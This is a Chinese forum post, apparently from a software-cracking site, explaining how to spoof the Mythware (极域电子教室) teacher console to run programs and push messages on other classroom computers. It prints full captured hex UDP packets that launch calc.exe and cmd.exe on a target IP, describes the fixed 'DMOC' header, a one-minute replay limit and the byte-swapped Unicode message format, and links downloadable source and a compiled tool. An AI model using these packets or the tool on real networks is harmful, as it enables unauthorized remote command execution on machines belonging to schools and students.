本帖最后由 jidesheng6 于 2020-10-24 16:21 编辑
大概是去年,有看到CSDN上面几位大佬提到过,抓数据包来用极域去反控制其他机房的学生电脑,但是写的其实还是不是太详细,有代码,我当时也没看懂,最近无聊就重新实操了一下,在这过程还发现了不少坑。
首先老样子介绍一下软件:软件是极域电子教室V6.0 2016豪华版,具体版本号我没去看,现在学校机房大多数用的都是这个版本。
首先打开Wireshark来抓包看看:
不难发现,教师端的机器一直在朝224.50.50.42这个地址发送数据包,其中含义我们也不清楚,后来在网上找到了一篇网站是介绍这个极域电子教室工作流程的
接着我们来给学生机器执行一条远程命令试试,然后停止抓包
因为我们是针对一个机器来执行命令的,所以找到目标机器的IP地址:192.168.3.2,可以在Wireshark下面看到请求的执行文件名,前面还有一堆含义未知的数据,另外:数据包的长度建议只多不少,不然消息无法发送出去
我们去把十六进制数据复制下来,得到这些数据:
[Asm] 纯文本查看 复制代码 444d4f43000001006e03000053ca6c1aee108e419f4972f36d109c69204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c00430041004c0043002e0045005800450000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000
数据包很长,但是无用的数据也很多,上面是打开计算器的数据包,接下来再抓一下打开CMD的数据包:
[Asm] 纯文本查看 复制代码 444d4f43000001006e030000a53fbfe91d62404cb156c44f90b18441204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e00650078006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000
两段数据包有点相似,经过多次抓包实验发现,得出一个结论,前面的:
[Asm] 纯文本查看 复制代码 444d4f43000001009e030000dc79fabb169ec04ca009db380f7f34ee204e0000c0a803fe9103000091030000000800000000000005000000
这一段很有可能就是固定不变的值,起码DMOC这段十六进制是不变的,后期发现,相同数据包在一分钟之内只能发送一次,后面我没有去改代码,应该是dmoc后面随机几个字符,就可以实现了,有大佬有能力可以试试,这些都是猜测,如果说的不对也不要怪我哈
到这里还没有完,因为还有一个发送消息的数据包,我们发一条消息给目标计算机:
发送过去之后,我们来查看数据包:
可以看到,前面一堆数据之后,出现了我们发送的信息(604F7D59),这边就踩了不少坑,之前以为是十六进制,想着转成十六进制带进去就行了,结果发出来是乱码的,于是把汉字用各种编码试了一便,最后发现,
是Unicode编码打乱顺序以后再发送的,解码是学生端那边的事情:
可以看到“你好”这两个汉字转出来的Unicode编码是:\u4f60\u597d
处理一下就是:4f60597d,仔细观察,是把这一段分成了两部分,四个为一组,把最后两个和第一二个位置调换,如果我们直接按照转换的4f60597d发送,客户端接收到的就是乱码,我们把乱码拿到Unicode这里重新转换一次,就是我们Wireshark里面的排序方式,说的有点乱,具体是什么样子我也记不清了,可以自己试试
既然知道了排序方法,就来处理一下,但是我只处理了中文,对英文数字没做处理,有兴趣的可以自己处理一下:
Python下的处理方式:
易语言里面的处理:
最后我们把这些得到的数据组合起来,用UDP方法发送出去就可以了(所有的命令一分钟内貌似只能执行一次,需要多次执行可能要随机UDP包数据的开头部分,这个我没做,大佬可以试试看)
效果如下:
悄咪咪说一句:然而不能在学校里面测试了,因为已经不用回学校了 ,虽然写着无需教师端,但是教师端是要在线且要发送消息的IP连上教师机才可以
E语言源码,看到有老哥要的,这个应该不算病毒吧:
MythwareReverse.zip
(933.6 KB, 下载次数: 1424)
更新一个编译好的,还是初始版本,有的老哥要直接用的,下载这个吧:
极域1.0.zip
(1.1 MB, 下载次数: 2449)
| 
[复制链接]
发表于 2020-1-17 19:05
|
发表于 2021-3-31 12:31
